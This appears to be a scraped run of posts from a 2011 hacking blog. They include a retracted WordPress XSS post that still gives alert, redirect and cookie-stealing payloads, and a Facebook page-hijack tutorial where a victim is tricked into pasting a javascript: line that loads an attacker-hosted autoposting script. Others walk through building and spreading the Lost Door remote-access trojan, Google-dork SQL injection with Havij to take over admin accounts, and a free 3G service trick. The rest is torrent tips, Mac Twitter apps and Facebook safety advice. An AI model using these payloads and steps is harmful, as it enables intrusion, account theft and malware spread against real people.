My earlier post about the XSS vulnerability in WordPress 3.2.1 turned out to be a False Alarm. WordPress allows the privileged users to post comments without filtering the HTML tags but for a normal underprivileged user it will filter the tags. I am sorry for the inconvenience. My Intentions were to make all you guys aware of this vulnerability so that you could save your blog from being hacked.

But now I am glad that WordPress is safe.

Bad news for just about every WordPress blogger out there. Thousands of WordPress 3.2.1 installations are at risk of being compromised. It has been found that the latest version 3.2.1 of WordPress, an extremely popular suite of tools for powering blogs, is vulnerable to XSS injection attack which allows users to inject malicious JavaScript as a result of failure in sanitizing the comments field. Without discussing much about what this vulnerability could do to your blog I will jump to how it works and the solution.

How does it work?

Inject one of the below codes into the comment field of the target. Or use your brain to make a more powerful injection

Popup “alert” Box
<script>alert(‘hungry-hackers.com’)</script>

Redirect to www.hungry-hackers.com
<script>document.location=”http://hungry-hackers.com”</script>

Cookie Stealer (need a logging system in place)
<script>document.location=***8221;***91;url***93;http://your-domain/your***91;/url***93; stealer.php?cookie=***8221; + document.cookie;document.location=***8221;http://the-site-you-are-stealing-from.com”</script>

Solution:

Upgrade to the latest version when available, In the meantime disable comments or hold comments for moderation as I did

According the Facebook statistics there are more than 750 Million Active facebook users. This makes is a very important target for all the hackers. I have no doubts that the developers at facebook are working 24×7 to make it as secure as possible but the hackers are also working 24×7 to find out a loophole using which they could take control of your account. But for our safety we also need to work a little harder. According to me, the best possible way to do this is by learning how to hack facebook yourself. If you know the loopholes you will never fall for it.

Now you might be thinking, how can I learn about hacking Facebook. If you ask me, I would say google it and learn it yourself. But I know that nobody has got so much time to search for each and every facebook hack possible. Luckily Rafay Baloch, the author of “A beginners Guide To Ethical Hacking”, has the answer to your question with his newly created “Facebook Hacking Course“.

Facebook hacking course is basically a set of videos which will show you different methods used by hackers to hack Facebook account passwords and how you can protect your self from getting hacked. It will include each and every possible methods that a hacker could use to get your facebook credentials. Along with each video you will get a lab which will tell you exactly how to replicate this attack in a safe environment. It also provides bonus techniques using which you could become anonymous on the internet. If you want to become a hacker this is the first thing you would want to learn. There is also a second bonus with it. You will get email support from none other than Rafay himself.

Now before you make your decision lets hear some words from Rafay: “Friends, if you ask me “Is Facebook safe?” my answer would be “Yes. Its safer than your own computer but remember it is still possible that your facebook account may get hacked and that is because all the hacking methods are client based and not server based, which means that the hackers directly attack you and not facebook. And securing your facebook account depends on how better you can avoid these attacks.”

Now I leave it up to you. You may go and take this course which I would highly recommend or you may leave it up to the hackers to find and hack your account.

How to get the Facebook Hacking Course?

You can get this Facebook hacking course from Here.

Are you tired of using the low speed 2G service? I know your answer is ‘YES’. We all want to lay our hands on the latest high speed 3G service which gives a  download speed of 500 kbps to 1000 kbps. Today I will show a trick using which you can use unlimited 3G service for free.

Requirements

1. Tata Docomo SIM Card with a balance of more than Rs. 1
2. 3G enabled cellphone

Steps

1. Create New Access Point Using Below Configuration and restart your cellphone.
   

   • Name : Tata Docomo or any
   • Access Point ( APN ) – tata.docomo.dive.in
   • Homepage : www.google.com or any
   • Proxy : 202.87.41.147
   • Proxy Port : 8080
   • Username : leave blank
   • Password : leave blank

2. Download Operamini 4.2 Handler Browser
3. Open your Opera mini handler and do the following changes in the Setiings:
   

   • Set Divein Settings as Default Settings For Opera Mini
   • Set http in Custom Field in your Opera Mini handler
   • Set Socket Server to http://203.115.112.5.server4.operamini.com OR http://10.124.72.171.server4.operamini.com
   • Keep Proxy Type as blank (Don’t Enter Anything in Proxy Server Field)

4. Done!! Now use your free unlimited 3G service. Enjoy!!

We all love torrents because they are free. In the last few weeks I have been downloading a lot of movies/softwares from torrents. While messing with the torrents I found a few things which turned out to be very fruitful. Today I will show you how to use those tricks to get maximum performance from your P2P Softwares.

Note: I use uTorrent so all the following Hacks have been tested on the latest version of uTorrent only. You may test it on other P2P softwares and let us know about your experience

1. Increase Download Speed

Do the following changes in the preference of uTorrent.

Go to Options>Preferences>Network

2. Block Fake Peers

Anti-P2P organizations are actively polluting P2P networks with fake peers, which send out fake or corrupt data in order to waste bandwidth and slow down file transfers. At its worst, when downloading major copyrighted torrents, as much as a fourth of the peers you are connected to can be attributed to various Anti-P2P agencies. There is also a much more serious side to this. Once you’ve established a connection to one of these fake “peers”, your IP has been logged and will most likely be sent to the RIAA/MPAA.

But there is a way to fight back! If you are using the latest uTorrent, you can employ a little known feature called IP filtering. The author of uTorrent has gone out of his way to hide it, but it’s there nonetheless. But before we can activate this filter, we need to retrieve a list of currently known Anti-P2P organization IPs.

This is most easily done by downloading the latest blacklist from Bluetack (the same people who wrote SafePeer for the Azureus BT client).

This list is updated daily, and contains all known Anti-P2P organizations, trackers and peers, aswell as all known Goverment/Military IP addresses as collected by the Bluetack team. Once downloaded, extract and rename the file to “ipfilter.dat” in preparation for the final step.

To make the list available to uTorrent, you need to put it in %AppData%\uTorrent\. So type this into the Address Bar, or click Start -> Run and type it there. After placing the ipfilter.dat in this folder, start uTorrent and go into preferences (Ctrl+P), then click on “Advanced”. In the right hand pane, make sure that “ipfilter.enable” is set to true, and then close the dialog. That’s it for the configuration.

You can verify that the list has been loaded by looking under the “Logging” tab of uTorrent, where you should see the line “Loaded ipfilter.dat (X entries)”.

3. Hide your IP

Your IP address is your online identity and could be used by hackers to break into your computer, steal personal information, or commit other crimes against you. Hide My IP allows you to surf anonymously, change your IP address, prevent identity theft, and guard against hacker intrusions. This software can not only be used in case of hiding your IP from other peers but also useful if you want to browse internet anonymously.

]]> http://www.hungry-hackers.com/2011/05/tips-to-get-maximum-performance-from-your-p2p-softwares.html/feed 4 http://www.hungry-hackers.com/2011/03/6-tips-to-avoid-facebook-viruses-and-spam-messages.html http://www.hungry-hackers.com/2011/03/6-tips-to-avoid-facebook-viruses-and-spam-messages.html#comments Sat, 05 Mar 2011 08:57:16 +0000 Ashik http://www.hungry-hackers.com/?p=1953 Continue reading →]]> Facebook, the biggest social network with 500 million users, provides an interface to hit an unsuspecting crowd with malware and viruses. These viruses aren’t very difficult to detect  if you are cautious enough. These Facebook viruses appear on your wall in forms of a bizarre or eye-catching stories and videos and once the user has clicked/liked the link, it is already late. The next step will be getting rid of your Facebook virus which is a time-consuming  process.  Its better to avoid spam messages and trojan viruses in the first place.

How to avoid it?

1. Think before you Act. Viruses on Facebook are sneaky. The hackers and cybercriminals who want your information know that Facebook users will often click on an interesting post without a moment’s thought. If a post sounds a bit over-the-top like a headline out of a tabloid, this is your first warning sign.

2. Try to avoid Links and videos with Catchy words like  “funniest ever,” “most hilarious video on Facebook,” or “you’ve got to see this.” Do some keyword research to see if the post in question comes up in a search engine with information about a current virus or trojan.

3. Check the poster of the Suspicious content. If you receive a message from someone you do not know, this is an obvious red flag. Facebook video viruses also tend to pop up in your news feed or on your wall from friends you haven’t talked to in a while. Unfortunately, it’s likely this friend has already fallen victim to the latest virus on Facebook. After clicking on the story themselves, the message was sent out to all of their friends as well.

4 Avoid messages that have been posted by multiple users as the virus spreads among your friends who were not so cautious. If a link with title such as “Sexiest video ever” shows up all over your feed from all kinds of people (perhaps friends you would not expect to make such a post), this is another warning sign. Similar direct messages are a likely variant of the notorious Facebook Koobface virus which has used this approach in the past.

5. Do not fall for the “typical” money-transfer schemes. Chat messages from friends needing funds will usually sound suspicious. Everything can’t be screened before posting, so money transfer scams and hoax applications still find their way on to Facebook. You should also avoid applications that claim to do a full “Error check” or fix security problems related to your profile.

6. Update your anti-virus software frequently. If you do accidentally click on a post before realizing it is a hoax, do not click on any further links or downloads. If it’s too late and you have already been infected, the Facebook virus removal process may be effortless if you have a good anti-virus program to catch the virus, trojan or other malware early on.

What’s Next?

These were few important tips to safeguard your facebook account but your job isn’t done yet. Once you have detected that the link/post on your facebook wall is Malicious you should Mark it as SPAM so that the facebook support will stop it from spreading further and infecting other users.

If you have ever fallen victim of any such Malicious Scheme, please share your experience with all the users  in form of comments so that others don’t fall victim of it.

Now lets start the tutorial. First of all we will need to setup an exploit  and a website to host the exploit. If you already have a hosting then its great otherwise there are couple of free hosting websites that can be used for such purposes. I will tell you about it along with the tutorial.

Disclaimer: Coder and related sites are not responsible for any abuse done using this trick.

1. Download the exploit from this Link.

2. After downloading it, you need to edit the it. Get notepad++, one of my hot favorite editor. You can download it from here.

3. Open the file named pagehack.js with notepad++. Now find the text wamiqali@hungry-hackers.com by pressing ctrl+f and replace it with your own email id which you have used while signing up for facebook.

4. Now you have to change the viral text which will be sent to the friends of the victims. To do this, find the text Hey See what i got! and replace it with your own text. This text will be sent to the facebook wall of 15 friends of the victim. Since it is an autoposting bot, to prevent facebook from blocking it, I reduced its capacity to 15. Now just save it as anything.js (Tip: Be social engineer and rename it to something more attractive like getprizes.js or booster.js)

5. Now you have to upload this script to your server. For this make an account at 0fess.net or 000webhost.com (t35 or 110mb won’t help this time) and use filezilla and upload this to your root. So the address where your script is uploaded will be as follows:

www.yoursite.0fess.net/booster.js

6. Now comes the most important part of this Hack. You need to convince the admin of that Fan page to put the following code (Note: Don’t forget to replace the text in bold with the address of your script) in his browser’s address bar and hit enter while he is on Facebook.

javascript:(a = (b = document).createElement(“script”)).src = “//www.yoursite.0fess.net/booster.js“, b.body.appendChild(a); void(0)

Tip: You can fool him by making him greedy to grab something. You can also encode this in ASCII format for more better results.

About the author:

Wamiq Ali is a tech. lover and a hacker,this is his first post at hungry-hackers. Linux is one of his favourite platforms. He blogs at www.hackersthirst.com.

The popularity of Twitter has increased tremendously in past few years. As a result a lot of Twitter Desktop applications are available to the users for download these days. These applications allow you to receive and post Tweets from your desktop without visiting your Twitter.com page. To reduce your burden of finding the appropriate app for you from such a big pool of apps, we have compiled a list of Best Twitter Desktop apps available in the market. Earlier I had compiled a list of 20 Best Twitter Desktop Apps for Windows. Today I give you 9 Best Twitter Apps for Mac.

1. EventBox

This just-for-Mac app is a favorite of many because it supports Twitter, Facebook, Flickr integration, feed reading with Google Reader and internet trend watching with Reddit and Digg . Keyboard shortcuts, hotkeys, Instapaper integration, and photo uploads to Flickr and Facebook make EventBox pretty nifty. It’s also got a very slick interface with a navigation menu on the left-hand side.

2. Mac Lounge

This app is incredibly appealing for its dead simple, single column interface and respectable feature set. We, of course, love the multiple account support, but also appreciate saved searches, quick access to view followers and following, and tweet options to link to tweet, copy tweet, or copy tweet URL. There’s also an accompanying iPhone app, which syncs with the desktop version and greatly improves the app’s relevance.

3. Nambu

This really sophisticated Mac app should be more than enough for any and all of your Twitter needs. You’ve got access to your followers and friends, custom groups, search (integrated with FriendFeed and One Riot), trends, tr.im and pic.im integration, multiple accounts, Ping .fm integration, filters, and three view options for a one or many column view of tweets.

4. Sideline:

Sideline is just a search and trending topic app from Yahoo, but it does a darn good job at satisfying those specific needs. You can view current Twitter trends, select to see the three latest tweets or pop out as its own saved search, and create custom search groups as tabs.

5. Skimmer:

It’s hard not to love this app. Not only is it beautiful to look at it, but it also tracks your favorite social sites. Skimmer’s certainly not an application for the social media beginner, but power users of Facebook, Flickr, YouTube, Blogger, and Twitter, will appreciate the aggregation of content, filtering options, view types, and enhanced content viewing experience.

6. Tweetie

A full-featured Twitter client which is available in free ad supported and ad-free versions.  This Desktop app lets you view not only the tweets but also the entire conversation history leading to that tweet. It provides you with an independent compose windows that stay out of your way until you need them. Tweetie for Mac also has search trends to let you find out the hottest trend in Twitter. Other features include threaded DMs, user details, torn off search, bookmarklet, and preferences.

7. Twibble Desktop

Twibble is a bit of a riddle. It’s not a bad app when it comes to feature set, but it’s also not the most intuitive. You can manage multiple accounts, but all tweets are merged together in one stream. You can reply, DM, fav, RT, and copy tweets, but you’ll have to hover over the tweet to even know those behaviors are possible. You can also use keyboard shortcuts, filter your tweets for keywords, or conduct searches that open up in new windows, but Twibble just doesn’t seem to flow as easily as we’d like it to.

8. Twitterific

Lets you both read and publish posts or “tweets”  using a clean and concise  user interface designed to take up a minimum of real estate on your Mac’s desktop. The app shows a scrolling list of  the latest tweets from your friends, or public feeds. Its features include multiple Twitter account support, auto refreshing, inline display of replies and DMs, shows no. of unread tweets, quickly delete tweets, auto show/hide new tweets, single click access to user pages and more.

9. TwitterPod:

This app isn’t known for its sophistication or advanced Twitter functionality. TwitterPod is a basic single column Twitter app with an inline browser and the ability to filter for just tweets with links. Its heyday has long since passed, but original fan boys and girls may still be using this for their twittering.

Throughout this article I will teach you how to use Lost Door, a Windows RAT, to control and monitor a victim’s computer remotely.

Disclaimer: Coder and related sites are not responsible for any abuse done using this software.

Follow the steps below to setup a server for Lost Door.

• Download Lost Door from here . (Update: In case the given download link doesn’t work, use this secondary download link. The password to unzip this file is “ehacking.nethungry-hacker.com” without double quotes.)
• On executing the download file, you will see the following screen. Accept it

• After it is open, right click on the window and click on create server

• Now enter your IP address and DNS here. Leave the rest of the field as it is.

• Now click on the ‘Options’  tab and choose the options as you want. To activate an offline keylogger is a good practice.

• Now go to ‘Advanced’ Tab. There will options related to spreading. This will be used in case you have more than 1 victim.

• Now just go to the ‘Create’ tab and click on create server. Your server is ready for use now and now send it to the victim.

Sending the server file to your victim

This is the most important thing after you have created your server file. If you want to take control on a single computer than you have to send this server file to the desired victim but if you want to affect more and more people than you have to use some spreading techniques.

• If you have physical access to the victim’s computer then take the server file in a pen drive and just double click on your server file once you have injected the pen drive into that computer.
• For those who don’t have physical access can use social engineering in order to get the victim execute that file on his computer.

Using Spreading to affect multiple victims

If you have more than one victim, then you have an option of using spreading technique. You might think that by creating multiple server files you can control multiple users. But here is a secret about spreading. When you select the spreading option, the server file will act as a worm which will spread itself across different computers via Email or any other channel. So your burden will be only to get one victim to execute that file on his computer, the remaining job of getting other victims will be done on its own.

About The Author

This post is written by an Irfan Shaeel An Ethical hacker and Penetration tester, Irfan blogs At his blog Ehacking.net

SQL Injection can be done by manually injection or via automatic tools. Automatic tools are easy to use and do not require much technical knowledge.

In this tutorial we will discuss Havij. Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.

• You can download havij from here.
• We will use google dorks to find the vulnerable websites, there is a big list of google dorks  which I will post in my future articles but at this time we will only use the following:

inurl:index.php?id=

inurl:trainers.php?id=

inurl:buy.php?category=

inurl:article.php?ID=

• Just search google using one of the dork and you will see a lot of vulnerable websites.
• Open any one of the website than put  ‘ after the link look:

• If you get the following SQL error, that means the website is vulnerable to SQL-injection attack.

  

• Now open Havij and paste the link without ‘

  

  

• Now we have to find the columns of the database.

  

  

• After this you will be able to find the admin id or password but remember normally web server uses MD5 encryption technique, you have to decrypt this password use havij option MD5 or you may read our tutorial on Cracking MD5.

• After decrypting the password, you have to find the admin login page of the website. To do that use Havij options.
• Now you may login as the admin user and control the website as you want.
• H@ppy H@cking

Video Tutorial

About The Author

Irfan Shakeel is an ethical hacker/penetration tester and he have found many bugs on the famous web server. He is the founder of Ethical Hacking Blog.